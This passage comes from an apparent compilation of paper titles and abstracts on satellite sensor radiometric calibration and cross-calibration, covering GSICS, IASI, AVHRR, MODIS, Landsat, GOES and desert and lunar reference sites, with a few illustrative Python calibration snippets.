Many of the channels also vary with respect to channel brightness temperatures; however, for the upper tropospheric temperature channel (channel 4), the patterns of ISDs from low latitudes and high latitudes are very different due to the fact that the latitudinal variation of brightness temperature does not necessarily follow the latitudinal variation of the temperature lapse rate. The differences between observations in low latitudes and high latitudes form “fork” patterns in scatter plots of ISDs with respect to brightness temperatures. A comparison of ISDs derived from short-term global SNOs and those derived from multiyear polar SNOs reveals the advantage and the limitation of the two data sets. The multiyear polar SNO generally provides larger observation ranges of brightness temperatures in channels 1-4. The global SNO extends the brightness temperature observations to the warm sides for channels 5-12 and captures the occurrences of larger ISDs for most longwave channels. --- paper_title: GSICS Inter-Calibration of Infrared Channels of Geostationary Imagers Using Metop/IASI paper_content: The first products of the Global Space-based Inter-Calibration System (GSICS) include bias monitoring and calibration corrections for the thermal infrared (IR) channels of current meteorological sensors on geostationary satellites. These use the hyperspectral Infrared Atmospheric Sounding Interferometer (IASI) on the low Earth orbit (LEO) Metop satellite as a common cross-calibration reference. This paper describes the algorithm, which uses a weighted linear regression, to compare collocated radiances observed from each pair of geostationary-LEO instruments. The regression coefficients define the GSICS Correction, and their uncertainties provide quality indicators, ensuring traceability to the selected community reference, IASI. Examples are given for the Meteosat, GOES, MTSAT, Fengyun-2, and COMS imagers. Some channels of these instruments show biases that vary with time due to variations in the thermal environment, stray light, and optical contamination. These results demonstrate how inter-calibration can be a powerful tool to monitor and correct biases, and help diagnose their root causes. --- paper_title: Establishing the Antarctic Dome C community reference standard site towards consistent measurements from Earth observation satellites paper_content: Establishing satellite measurement consistency by using common desert sites has become increasingly more important not only for climate change detection but also for quantitative retrievals of geophysical variables in satellite applications. Using the Antarctic Dome C site (75°06′S, 123°21′E, elevation 3.2 km) for satellite radiometric calibration and validation (Cal/Val) is of great interest owing to its unique location and characteristics. The site surface is covered with uniformly distributed permanent snow, and the atmospheric effect is small and relatively constant. In this study, the long-term stability and spectral characteristics of this site are evaluated using well-calibrated satellite instruments such as the Moderate Resolution Imaging Spectroradiometer (MODIS) and Sea-viewing Wide Field-of-view Sensor (SeaWiFS). Preliminary results show that despite a few limitations, the site in general is stable in the long term, the bidirectional reflectance distribution function (BRDF) model works well, an... 
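The GSICS inter-calibration entry above describes the correction as a weighted linear regression of collocated radiances from each geostationary-LEO instrument pair, with the regression coefficients defining the GSICS Correction. The following Python sketch is not taken from that paper; the function names, the unit weights, and the synthetic collocations are illustrative assumptions showing one way such a correction could be fitted and applied.

```python
import numpy as np

def fit_gsics_correction(geo_radiance, ref_radiance, weights):
    """Weighted linear regression of collocated reference radiances (e.g. a
    hyperspectral sounder convolved to the GEO channel) against the monitored
    geostationary radiances.  The coefficients (offset, slope) define a
    correction of the form: corrected = offset + slope * observed."""
    x = np.asarray(geo_radiance, dtype=float)
    y = np.asarray(ref_radiance, dtype=float)
    w = np.asarray(weights, dtype=float)
    X = np.column_stack([np.ones_like(x), x])     # design matrix [1, x]
    XtW = X.T * w                                 # apply collocation weights
    beta = np.linalg.solve(XtW @ X, XtW @ y)      # solve (X' W X) beta = X' W y
    return beta[0], beta[1]

def apply_gsics_correction(geo_radiance, offset, slope):
    """Apply the fitted correction to monitored radiances."""
    return offset + slope * np.asarray(geo_radiance, dtype=float)

# Synthetic collocations, for illustration only.
rng = np.random.default_rng(0)
geo = np.linspace(40.0, 120.0, 300)                       # monitored channel radiances
ref = 1.2 + 0.985 * geo + rng.normal(0.0, 0.4, geo.size)  # reference radiances
offset, slope = fit_gsics_correction(geo, ref, weights=np.ones_like(geo))
corrected = apply_gsics_correction(geo, offset, slope)
```

In practice the weights would reflect collocation quality (e.g. spatial variance within the target area) rather than the uniform weights assumed here.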
--- paper_title: Using Moderate Resolution Imaging Spectrometer (MODIS) to calibrate advanced very high resolution radiometer reflectance channels paper_content: [1] A series of 10 advanced very high resolution radiometers (AVHRRs) flown on National Oceanic and Atmospheric Administration (NOAA)'s polar-orbiting satellites for over 20 years has provided data suitable for many quantitative remote sensing applications. To be useful for geophysical research, each radiometer must be accurately calibrated, which poses problems in the AVHRR reflectance channels because they have no onboard calibration. Previous studies have shown that values of the reflectance channel calibrations, accurately measured during preflight, change abruptly immediately after launch and then change slowly during the satellite's lifetime. The presence of the dual-gain reflectance channels on the current series of AVHRRs also complicates the application of previous calibration techniques. A technique is presented here for calibrating the AVHRR dual-gain reflectance channels using Moderate Resolution Imaging Spectrometer (MODIS) data. This method employs selective criteria to reproduce a laboratory type calibration where instrument counts observed by AVHRR are matched to reflectances measured by MODIS on a pixel by pixel basis for coincident and co-located scenes. Unlike AVHRR, MODIS employs onboard calibration of its reflectance channels. The goal here was to explore the utility of using MODIS to calibrate the new dual-gain reflectance channels of the AVHRR. The AVHRRs in the NOAA-KLM series of spacecraft employ a dual-gain approach to increase the sensitivity to dark scenes. Traditional methods using radiometrically stable targets to calibrate the reflectance channels of AVHRR typically do not provide data for both gain settings. The data from two scenes that met the over-pass criteria are analyzed. The regression of the MODIS reflectances versus the AVHRR counts for these scenes were able to produce calibration slopes and intercepts in both the low and high gain regions. The reflectance differences using the MODIS-derived calibration compared to preflight calibration are well within the expected behavior of the AVHRR during its first year in orbit. Comparison with reference ch1 and ch2 reflectance values from NOAA 9 for a Libyan Desert Target were within 5% of those using the MODIS-derived calibration. While the determination of the absolute accuracy this approach needs further study, it clearly offers the potential for calibration of the AVHRR dual-gain reflectance channels. --- paper_title: Accurate radiometry from space: an essential tool for climate studies paper_content: The Earth’s climate is undoubtedly changing; however, the time scale, consequences and causal attribution remain the subject of significant debate and uncertainty. Detection of subtle indicators from a background of natural variability requires measurements over a time base of decades. This places severe demands on the instrumentation used, requiring measurements of sufficient accuracy and sensitivity that can allow reliable judgements to be made decades apart. The International System of Units (SI) and the network of National Metrology Institutes were developed to address such requirements. However, ensuring and maintaining SI traceability of sufficient accuracy in instruments orbiting the Earth presents a significant new challenge to the metrology community. 
This paper highlights some key measurands and applications driving the uncertainty demand of the climate community in the solar reflective domain, e.g. solar irradiances and reflectances/radiances of the Earth. It discusses how meeting these uncertainties facilitate significant improvement in the forecasting abilities of climate models. After discussing the current state of the art, it describes a new satellite mission, called TRUTHS, which enables, for the first time, high-accuracy SI traceability to be established in orbit. The direct use of a ‘primary standard’ and replication of the terrestrial traceability chain extends the SI into space, in effect realizing a ‘metrology laboratory in space’. --- paper_title: Traceable radiometry underpinning terrestrial- and helio-studies (TRUTHS) paper_content: The Traceable Radiometry Underpinning Terrestrial- and Helio-Studies (TRUTHS) mission offers a novel approach to the provision of key scientific data with unprecedented radiometric accuracy for Earth Observation (EO) and solar studies, which will also establish well-calibrated reference targets/standards to support other SI missions. This paper will present the TRUTHS mission and its objectives. TRUTHS will be the first satellite mission to calibrate its instrumentation directly to SI in orbit, overcoming the usual uncertainties associated with drifts of sensor gain and spectral shape by using an electrical rather than an optical standard as the basis of its calibration. The range of instruments flown as part of the payload will also provide accurate input data to improve atmospheric radiative transfer codes by anchoring boundary conditions, through simultaneous measurements of aerosols, particulates and radiances at various heights. Therefore, TRUTHS will significantly improve the performance and accuracy of Earth observation missions with broad global or operational aims, as well as more dedicated missions. The provision of reference standards will also improve synergy between missions by reducing errors due to different calibration biases and offer cost reductions for future missions by reducing the demands for on-board calibration systems. Such improvements are important for the future success of strategies such as Global Monitoring for Environment and Security and the implementation and monitoring of international treaties such as the Kyoto Protocol. TRUTHS will achieve these aims by measuring the geophysical variables of solar and lunar irradiance, together with both polarized and un-polarized spectral radiance of the Moon, and the Earth and its atmosphere. --- paper_title: Summary of current radiometric calibration coefficients for Landsat MSS, TM, ETM+, and EO-1 ALI sensors paper_content: This paper provides a summary of the current equations and rescaling factors for converting calibrated Digital Numbers (DNs) to absolute units of at-sensor spectral radiance, Top-Of-Atmosphere (TOA) reflectance, and at-sensor brightness temperature. It tabulates the necessary constants for the Multispectral Scanner (MSS), Thematic Mapper (TM), Enhanced Thematic Mapper Plus (ETM+), and Advanced Land Imager (ALI) sensors. These conversions provide a basis for standardized comparison of data in a single scene or between images acquired on different dates or by different sensors. This paper forms a needed guide for Landsat data users who now have access to the entire Landsat archive at no cost.
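The Landsat calibration-coefficient summary above centres on the standard conversions from calibrated digital numbers to at-sensor radiance, top-of-atmosphere reflectance, and at-sensor brightness temperature. A minimal sketch of those conversions follows; the numeric gain, offset, ESUN, and K1/K2 values used in the example call are placeholders for illustration, not the tabulated per-band coefficients from the paper.

```python
import math

def dn_to_radiance(dn, gain, offset):
    """At-sensor spectral radiance from a calibrated digital number:
    L = gain * DN + offset  (W m^-2 sr^-1 um^-1)."""
    return gain * dn + offset

def toa_reflectance(radiance, esun, earth_sun_distance_au, solar_zenith_deg):
    """Top-of-atmosphere (planetary) reflectance from at-sensor radiance."""
    return (math.pi * radiance * earth_sun_distance_au ** 2) / (
        esun * math.cos(math.radians(solar_zenith_deg)))

def brightness_temperature(radiance, k1, k2):
    """At-sensor brightness temperature (K) for a thermal band, using the
    band-specific calibration constants K1 and K2."""
    return k2 / math.log(k1 / radiance + 1.0)

# Placeholder coefficient values; the cited paper tabulates the actual
# per-band constants for each sensor.
L = dn_to_radiance(dn=128, gain=0.7757, offset=-1.52)
rho = toa_reflectance(L, esun=1983.0, earth_sun_distance_au=1.0124, solar_zenith_deg=35.0)
tb = brightness_temperature(radiance=10.5, k1=607.76, k2=1260.56)
```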
--- paper_title: Radiometric Calibration of the Landsat MSS Sensor Series paper_content: Multispectral remote sensing of the Earth using Landsat sensors was ushered on July 23, 1972, with the launch of Landsat-1. Following that success, four more Landsat satellites were launched, and each of these carried the Multispectral Scanner System (MSS). These five sensors provided the only consistent multispectral space-based imagery of the Earth's surface from 1972 to 1982. This work focuses on developing both a consistent and absolute radiometric calibration of this sensor system. Cross-calibration of the MSS was performed through the use of pseudoinvariant calibration sites (PICSs). Since these sites have been shown to be stable for long periods of time, changes in MSS observations of these sites were attributed to changes in the sensors themselves. In addition, simultaneous data collections were available for some MSS sensor pairs, and these were also used for cross-calibration. Results indicated substantial differences existed between instruments, up to 16%, and these were reduced to 5% or less across all MSS sensors and bands. Lastly, this paper takes the calibration through the final step and places the MSS sensors on an absolute radiometric scale. The methodology used to achieve this was based on simultaneous data collections by the Landsat-5 MSS and Thematic Mapper (TM) instruments. Through analysis of image data from a PICS location and through compensating for the spectral differences between the two instruments, the Landsat-5 MSS sensor was placed on an absolute radiometric scale based on the Landsat-5 TM sensor. Uncertainties associated with this calibration are considered to be less than 5%. --- paper_title: Assessment of Midnight Blackbody Calibration Correction (MBCC) using the Global Space-based Inter-Calibration System (GSICS) paper_content: The geostationary meteorological satellites (GEO), such as Geostationary Operational Environmental Satellite (GOES), are susceptible to a calibration anomaly around local midnight of the sub-satellite point. A counter measure, the Midnight Blackbody Calibration Correction (MBCC) currently exists at operational level. In this study, the MBCC performance on GOES-11 satellite is characterized with the help of Global Space-based Inter-Calibration System (GSICS) data sets. Results from the comparison of coincident and collocated GSICS-based GOES-11-AIRS data pairs, corresponding to two and half year period from January 2007 through June 2009, reveal that "mid-night residuals" in brightness temperatures persist in all of the GOES-11 Infra-Red (IR) channels, in spite of MBCC. The GOES-11 split window channels (channels 4 and 5) consistently showed significantly large negative (GOES-11-AIRS) biases often reaching values of -1.5 K or less while the short wave Infra-Red (SWIR) channel (channel 2) produced relatively smaller negative biases (~ -0.3 K or less). Interestingly, the water vapor IR channel (channel 3) exhibits a different pattern from rest of the channels in which consistently opposite biases with small positive (GOES-11-AIRS) difference values (~ 0.3 K or less) could be observed. The reason for the differential behavior of GOES-11 channel 3 is yet to be understood, while it is hypothesized that this might be linked to the convolution algorithm used for matching the AIRS data spectrally with those from GOES water vapor channel.
The amount of midnight residuals is shown to have a consistent seasonal dependency, which gets repeated year after year, for the period considered in the analysis. --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: Landsat 4 Thematic Mapper Calibration Update paper_content: The Landsat 4 Thematic Mapper (TM) collected imagery of the Earth's surface from 1982 to 1993. Although largely overshadowed by Landsat 5 which was launched in 1984, Landsat 4 TM imagery extends the TM-based record of the Earth back to 1982 and also substantially supplements the image archive collected by Landsat 5. To provide a consistent calibration record for the TM instruments, Landsat 4 TM was cross-calibrated to Landsat 5 using nearly simultaneous overpass imagery of pseudo-invariant calibration sites (PICS) in the time period of 1988-1990. To determine if the radiometric gain of Landsat 4 had changed over its lifetime, time series from two PICS locations (a Saharan site known as Libya 4 and a site in southwest North America, commonly referred to as the Sonoran Desert site) were developed. The results indicated that Landsat 4 had been very stable over its lifetime, with no discernible degradation in sensor performance in all reflective bands except band 1. In contrast, band 1 exhibited a 12% decay in responsivity over the lifetime of the instrument. Results from this paper have been implemented at USGS EROS, which enables users of Landsat TM data sets to obtain consistently calibrated data from Landsat 4 and 5 TM as well as Landsat 7 ETM+ instruments. --- paper_title: Revised Landsat-5 TM radiometric calibration procedures and postcalibration dynamic ranges paper_content: Effective May 5, 2003, Landsat-5 (L5) Thematic Mapper (TM) data processed and distributed by the U.S. Geological Survey (USGS) Earth Resources Observation System (EROS) Data Center (EDC) will be radiometrically calibrated using a new procedure and revised calibration parameters. This change will improve absolute calibration accuracy, consistency over time, and consistency with Landsat-7 (L7) Enhanced Thematic Mapper Plus (ETM+) data. Users will need to use new parameters to convert the calibrated data products to radiance. The new procedure for the reflective bands (1-5,7) is based on a lifetime radiometric calibration curve for the instrument derived from the instrument's internal calibrator, cross-calibration with the ETM+, and vicarious measurements.
The thermal band will continue to be calibrated using the internal calibrator. Further updates to improve the relative detector-to-detector calibration and thermal band calibration are being investigated, as is the calibration of the Landsat-4 (L4) TM. --- paper_title: Assessing the consistency of AVHRR and MODIS L1B reflectance for generating Fundamental Climate Data Records paper_content: [1] Satellite detection of the global climate change signals as small as a few percent per decade in albedo critically depends on consistent and accurately calibrated Level 1B (L1B) data or Fundamental Climate Data Records (FCDRs). Detecting small changes in signal over decades is a major challenge not only to the retrieval of geophysical parameters from satellite observations, but more importantly to the current state-of-the-art calibration, since such small changes can easily be obscured by erroneous variations in the calibration, especially for instruments with no onboard calibration, such as the Advanced Very High Resolution Radiometer (AVHRR). Without dependable FCDRs, its derivative Thematic Climate Data Records (TCDRs) are bound to produce false trends with questionable scientific value. This has been increasingly recognized by more and more remote sensing scientists. In this study we analyzed the consistency of calibrated reflectance from the operational L1B data between AVHRR on NOAA-16 and -17 and between NOAA-16/AVHRR and Aqua/MODIS, based on Simultaneous Nadir Overpass (SNO) observation time series. Analyses suggest that the NOAA-16 and -17/AVHRR operationally calibrated reflectance became consistent two years after the launch of NOAA-17, although they still differ by 9% from the MODIS reflectance for the 0.63 μm band. This study also suggests that the SNO method has reached a high level of relative accuracy (∼1.5%) for estimating the consistency for both the 0.63 and 0.84 μm bands between AVHRRs, and a 0.9% relative accuracy between AVHRR and MODIS for the 0.63 μm band. It is believed that the methodology is applicable to all historical AVHRR data for improving the calibration consistency, and work is in progress generating FCDRs from the nearly 30 years of AVHRR data using the SNO and other complimentary methods. A more consistent historical AVHRR L1B data set will be produced for a variety of geophysical products including aerosol, vegetation, cloud, and surface albedo to support global climate change detection studies. --- paper_title: Diurnal and Scan Angle Variations in the Calibration of GOES Imager Infrared Channels paper_content: The current Geostationary Operational Environmental Satellite (GOES) Imager infrared (IR) channels experience a midnight effect that can result in erroneous instrument responsivity around satellite midnight. An empirical method named the Midnight Blackbody Calibration Correction (MBCC) was developed and implemented in the GOES Imager IR operational calibration, aiming to correct the midnight calibration errors. The main objective of this study is to evaluate the MBCC performance for the GOES-11/-12 Imager IR channels by examining the diurnal variation of the mean brightness temperature (Tb) bias with respect to reference instruments. Two well-calibrated hyperspectral radiometers on low Earth orbits (LEOs), the Atmospheric Infrared Sounder on the Aqua satellite and the Infrared Atmospheric Sounding Interferometer (IASI) on the Metop-A satellite, are used as the reference instruments in this study. 
However, as the timing of the collocated geostationary-LEO intercalibration data is related to the GOES scan angle, it is then necessary to assess the GOES scan angle calibration variations, which becomes the second objective of this study. Our results show that the applications and performance of the MBCC method varies greatly between the different channels and different times. While it is usually applied with high frequency for about 8 h around satellite midnight for the short-wave channels (Ch2), it may only be intensively used right after satellite midnight or even barely used for the other IR channels. The MBCC method, if applied with high frequency, can reduce the mean day/night calibration difference to less than 0.15 K in almost all the GOES IR channels studied in this paper except for Ch4 (10.7 μm). The uncertainty of the nighttime GOES and IASI Tb difference for different scan angles is less than 0.1 K in each IR channel, indicating that there is no apparent systematic variation with the scan angle, and therefore, the estimated diurnal cycles of GOES Imager calibration is not prone to the systematic effects due to scan angle. --- paper_title: An Evaluation of the Uncertainty of the GSICS SEVIRI-IASI Intercalibration Products paper_content: Global Space-based Inter-Calibration System (GSICS) products to correct the calibration of the infrared channels of the Meteosat/SEVIRI (Spinning Enhanced Visible and Infrared Imager) geostationary imagers are based on comparisons of collocated observations with Metop/IASI (Infrared Atmospheric Sounding Interferometer) as a reference instrument. Each step of the cross-calibration algorithm is analyzed to produce a comprehensive error budget, following the Guide to the Expression of Uncertainty in Measurement. This paper aims to validate the quality indicators provided as uncertainty estimates with the GSICS correction. The methodology presented provides a framework to allow quantitative tradeoffs between the collocation criteria and the number of collocations generated to recommend further algorithm improvements. It is shown that random errors dominate systematic ones and that combined standard uncertainties (with coverage factor k = 1) in the corrected brightness temperatures are ~ 0.01 K for typical clear sky conditions but increase rapidly for low radiances - by more than one order of magnitude for 210 K scenes, corresponding to cold cloud tops. --- paper_title: CLARREO: cornerstone of the climate observing system measuring decadal change through accurate emitted infrared and reflected solar spectra and radio occultation paper_content: The CLARREO mission addresses the need to provide accurate, broadly acknowledged climate records that can be used to validate long-term climate projections that become the foundation for informed decisions on mitigation and adaptation policies. The CLARREO mission accomplishes this critical objective through rigorous SI traceable decadal change observations that will reduce the key uncertainties in current climate model projections. These same uncertainties also lead to uncertainty in attribution of climate change to anthropogenic forcing. CLARREO will make highly accurate and SI-traceable global, decadal change observations sensitive to the most critical, but least understood climate forcing, responses, and feedbacks.
The CLARREO breakthrough is to achieve the required levels of accuracy and traceability to SI standards for a set of observations sensitive to a wide range of key decadal change variables. The required accuracy levels are determined so that climate trend signals can be detected against a background of naturally occurring variability. The accuracy for decadal change traceability to SI standards includes uncertainties associated with instrument calibration, satellite orbit sampling, and analysis methods. Unlike most space missions, the CLARREO requirements are driven not by the instantaneous accuracy of the measurements, but by accuracy in the large time/space scale averages that are necessary to understand global, decadal climate changes. --- paper_title: Operational calibration of the Advanced Very High Resolution Radiometer (AVHRR) visible and near-infrared channels paper_content: The Advanced Very High Resolution Radiometer (AVHRR) visible and near-infrared channels must be calibrated after launch to maintain the accuracy of data derived from these channels for quantitative utilizations. The postlaunch calibration of these channels can only be carried out vicariously. The National Oceanic and Atmospheric Administration (NOAA) – National Environmental Satellite, Data, and Information Service (NESDIS) has been using the Libyan Desert as reference for operational calibration of AVHRR visible and near-infrared channels since 1995. A previous algorithm was successful correcting for the long-term instrument degradation in recalibration but had difficulty updating instrument calibration in near-real-time operation. This paper describes the operational calibration algorithm implemented since 2003, which overcomes the existing shortcomings by reducing target contamination and accounting for the effects of target bidirectional reflectance distribution function. Application of the algorithm s... --- paper_title: Effects of Ice Decontamination on GOES-12 Imager Calibration paper_content: More precise and accurate geostationary measurements are highly needed for satellite applications. It was well known that the Geostationary Operational Environmental Satellite (GOES)-12 imager was susceptible to water-ice contamination, and thus, several decontamination efforts were carried out to remove built-up ice on the instrument during operation. The intercalibration results of GOES-12 with the Atmospheric Infrared (IR) Sounder (AIRS) and the Infrared Atmospheric Sounding Interferometer (IASI) indicate that the calibration accuracy of GOES-12 was impacted by the decontamination procedures. Relative to the AIRS and the IASI, the GOES-12 imager radiances or brightness temperatures increased in the CO2 sounding channel (channel 6, 13.3 μm) and decreased in the water-vapor absorption channel (channel 3, 6.5 μm) but was less changed in the window channel (channel 4, 10.7 μm). A simple conceptual model is then proposed to give a physical explanation on the different behaviors of three IR channels in response to the ice-removal procedures. --- paper_title: Correction for GOES Imager Spectral Response Function Using GSICS.
Part II: Applications paper_content: During the Geostationary Operational Environmental Satellite (GOES)-14 and -15 post-launch test (PLT) for science periods, an up to ~ 2 K mean brightness temperature (Tb) bias with respect to collocated Atmospheric Infrared Sounder (AIRS) and Infrared Atmospheric Sounding Interferometer (IASI) observations was observed in the absorptive IR channels of the GOES-14/15 Imagers. These large scene-dependent biases were believed to be caused mainly by spectral characterization errors. In this paper, we refined the spectral response function (SRF) shift algorithm which was developed during the GOES-13 PLT period to improve the GOES-14/15 Imager IR radiometric calibration accuracy by accurately calculating the impact of blackbody on the calibrated scene radiance. The uncertainty of the SRF shift algorithm was estimated and used to guide the final selection of the total amount of central wave-number shift. This refined algorithm was first verified with GOES-13 Imager Ch6 data and then used to evaluate and further revise the audited GOES-14/15 SRFs provided by the instrument vendor. Based on this algorithm, the optimal SRF shifts were -1.98 cm-1 for GOES-13 Ch6, -8.25 cm-1 for GOES-14 Ch3, -0.25 cm-1 for GOES-14 Ch6, -6.25 cm-1 for GOES-15 Ch3 and +0.50 cm-1 for GOES-15 Ch6. The newly shifted SRFs were operationally implemented into the GOES-14/15 Imager IR calibrations in the August of 2011 and successfully reduced the mean all-sky Tb bias with respect to the reference instrument to less than 0.15 K. The scene-dependent bias, which can be nonlinear at large erroneous SRF, was also greatly reduced. The same method was applied to correct the GOES-12 Imager Ch6 SRF which has a changing SRF error during its mission life. A strong linear relationship between the optimal SRF shifts and the mean Tb bias with respect to the AIRS data was observed at this channel. This strong linear relationship can be used to revise the GOES-12 Ch6 SRF for a better radiance simulation. The method described in this paper is particularly important to evaluate and revise the erroneous SRF, if it exists, after satellite launch yet before it becomes fully operational. --- paper_title: Selection and characterization of Saharan and Arabian desert sites for the calibration of optical satellite sensors paper_content: Desert areas are good candidates for the assessment of multitemporal, multiband, or multiangular calibration of optical satellite sensors. This article describes a selection procedure of desert sites in North Africa and Saudi Arabia, of size 100 × 100 km2, using a criterion of spatial uniformity in a series of Meteosat-4 visible data. Twenty such sites are selected with a spatial uniformity better than 3% in relative value in a multitemporal series of cloud free images. These sites are among the driest sites in the world. Their meteorological properties are here described in terms of cloud cover with ISCCP data and precipitation using data from a network of meteorological stations. Most of the selected sites are large sand seas, the geomorphology of which can be characterized with Spot data. The temporal stability of the spatially averaged reflectance of each selected site is investigated at seasonal and hourly time scales with multitemporal series of Meteosat-4 data. It is found that the temporal variations, of typical peak-to-peak amplitude 8–15% in relative value, are mostly controlled by directional effects. 
Once the directional effects are removed, the residual rms variations, representative of random temporal variability, are on the order of 1–2% in relative value. The suitability of use of these selected sites in routine operational calibration procedures is briefly discussed. --- paper_title: Cross Calibration Over Desert Sites: Description, Methodology, and Operational Implementation paper_content: Radiometric cross calibration of Earth observation sensors is a crucial need to guarantee or quantify the consistency of measurements from different sensors. Twenty desert sites, historically selected, are revisited, and their radiometric profiles are described for the visible to the near-infrared spectral domain. Therefore, acquisitions by various sensors over these desert sites are collected into a dedicated database, Structure d'Accueil des Donnees d'Etalonnage, defined to manage operational calibrations and the required SI traceability. The cross-calibration method over desert sites is detailed. Surface reflectances are derived from measurements by a reference sensor and spectrally interpolated to derive the surface and then top-of-atmosphere reflectances for spectral bands of the sensor to calibrate. The comparison with reflectances really measured provides an estimation of the cross calibration between the two sensors. Results illustrate the efficiency of the method for various pairs of sensors among AQUA-Moderate Resolution Imaging Spectroradiometer (MODIS), Environmental Satellite-Medium Resolution Imaging Spectrometer (MERIS), Polarization and Anisotropy of Reflectance for Atmospheric Sciences Couples With Observations From a Lidar (PARASOL)-Polarization and Directionality of the Earth Reflectances (POLDER), and Satellite pour l'Observation de la Terre 5 (SPOT5)-VEGETATION. MERIS and MODIS calibrations are found to be very consistent, with a discrepancy of 1%, which is close to the accuracy of the method. A larger bias of 3% was identified between VEGETATION-PARASOL on one hand and MERIS-MODIS on the other hand. A good consistency was found between sites, with a standard deviation of 2% for red to near-infrared bands, increasing to 4% and 6% for green and blue bands, respectively. The accuracy of the method, which is close to 1%, may also depend on the spectral bands of both sensor to calibrate and reference sensor (up to 5% in the worst case) and their corresponding geometrical matching. --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. 
For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: Applications of Spectral Band Adjustment Factors (SBAF) for Cross-Calibration paper_content: To monitor land surface processes over a wide range of temporal and spatial scales, it is critical to have coordinated observations of the Earth's surface acquired from multiple spaceborne imaging sensors. However, an integrated global observation framework requires an understanding of how land surface processes are seen differently by various sensors. This is particularly true for sensors acquiring data in spectral bands whose relative spectral responses (RSRs) are not similar and thus may produce different results while observing the same target. The intrinsic offsets between two sensors caused by RSR mismatches can be compensated by using a spectral band adjustment factor (SBAF), which takes into account the spectral profile of the target and the RSR of the two sensors. The motivation of this work comes from the need to compensate the spectral response differences of multispectral sensors in order to provide a more accurate cross-calibration between the sensors. In this paper, radiometric cross-calibration of the Landsat 7 Enhanced Thematic Mapper Plus (ETM+) and the Terra Moderate Resolution Imaging Spectroradiometer (MODIS) sensors was performed using near-simultaneous observations over the Libya 4 pseudoinvariant calibration site in the visible and near-infrared spectral range. The RSR differences of the analogous ETM+ and MODIS spectral bands provide the opportunity to explore, understand, quantify, and compensate for the measurement differences between these two sensors. The cross-calibration was initially performed by comparing the top-of-atmosphere (TOA) reflectances between the two sensors over their lifetimes. The average percent differences in the long-term trends ranged from -5% to +6%. The RSR compensated ETM+ TOA reflectance (ETM+*) measurements were then found to agree with MODIS TOA reflectance to within 5% for all bands when Earth Observing-1 Hyperion hyperspectral data were used to produce the SBAFs. These differences were later reduced to within 1% for all bands (except band 2) by using Environmental Satellite Scanning Imaging Absorption Spectrometer for Atmospheric Cartography hyperspectral data to produce the SBAFs. --- paper_title: Ice contamination of Meteosat/SEVIRI IR13.4 channel implied by Inter-Calibration against Metop/IASI paper_content: The inter-calibration of the infrared channels of the geostationary Meteosat/SEVIRI satellite instruments shows most channels are radiometrically consistent with Metop-A/IASI, which is used as a reference instrument. However, the 13.4 µm channel shows a cold bias of ∼1 K in warm scenes, which changes with time. This is shown to be consistent with the contamination of SEVIRI by a layer of ice ∼1 µm thick building up on the optics, which is believed to have condensed from water outgassed from the spacecraft. This modifies the spectral response functions and hence the weighting functions of channels in stronger atmospheric absorption bands, thus introducing an apparent calibration error. 
Analysis of the radiometer's gain using views of the on board black body source and cold space confirm a loss consistent with transmission through a layer of comparable thickness, which also increases the radiometric noise — especially for channels near the 12 µm libration band of water ice. Inter-calibration, such as the Global Space-based Inter-Calibration System (GSICS) Correction, offers an empirical method to correct this bias. --- paper_title: Spectral Reflectance Corrections for Satellite Intercalibrations Using SCIAMACHY Data paper_content: High-resolution spectra measured by the ENVISAT SCanning Imaging Absorption spectroMeter for Atmospheric CartograpHY (SCIAMACHY) are used to develop spectral correction factors for satellite imager solar channels to improve the transfer of calibrations from one imager to another. SCIAMACHY spectra averaged for various scene types demonstrate the dependence of reflectance on imager spectral response functions. Pseudo imager radiances were computed separately over land and water from SCIAMACHY pixel spectra taken over two tropical domains. Spectral correction factors were computed from these pseudo imager radiance pairs. Intercalibrations performed using matched 12th Geostationary Operational Environmental Satellite and Terra MODerate-resolution Imaging Spectroradiometer (MODIS) visible ( ~ 0.65 μm) channel data over the same domains yielded ocean and land calibration gain and offset differences of 4.5% and 41%, respectively. Applying the spectral correction factors reduces the gain and offset differences to 0.1% and 3.8%, respectively, for free linear regression. Forcing the regression to use the known offset count reduces the land-ocean radiance differences to 0.3% or less. Similar difference reductions were found for matched MODIS and Meteosat-8 Spinning Enhanced Visible and Infrared Imager channel 2 ( ~ 0.86 μm ). The results demonstrate that SCIAMACHY-based spectral corrections can be used to significantly improve the transfer of calibration between any pair of imagers measuring reflected solar radiances under similar viewing and illumination conditions. --- paper_title: Impacts of spectral band difference effects on radiometric cross-calibration between satellite sensors in the solar-reflective spectral domain paper_content: Abstract In order for quantitative applications to make full use of the ever-increasing number of Earth observation satellite systems, data from the various imaging sensors involved must be on a consistent radiometric scale. This paper reports on an investigation of radiometric calibration errors due to differences in spectral response functions between satellite sensors when attempting cross-calibration based on near-simultaneous imaging of common ground targets in analogous spectral bands, a commonly used post-launch calibration methodology. Twenty Earth observation imaging sensors (including coarser and higher spatial resolution sensors) were considered, using the Landsat solar reflective spectral domain as a framework. Scene content was simulated using spectra for four ground target types (Railroad Valley Playa, snow, sand and rangeland), together with various combinations of atmospheric states and illumination geometries. Results were obtained as a function of ground target type, satellite sensor comparison, spectral region, and scene content. 
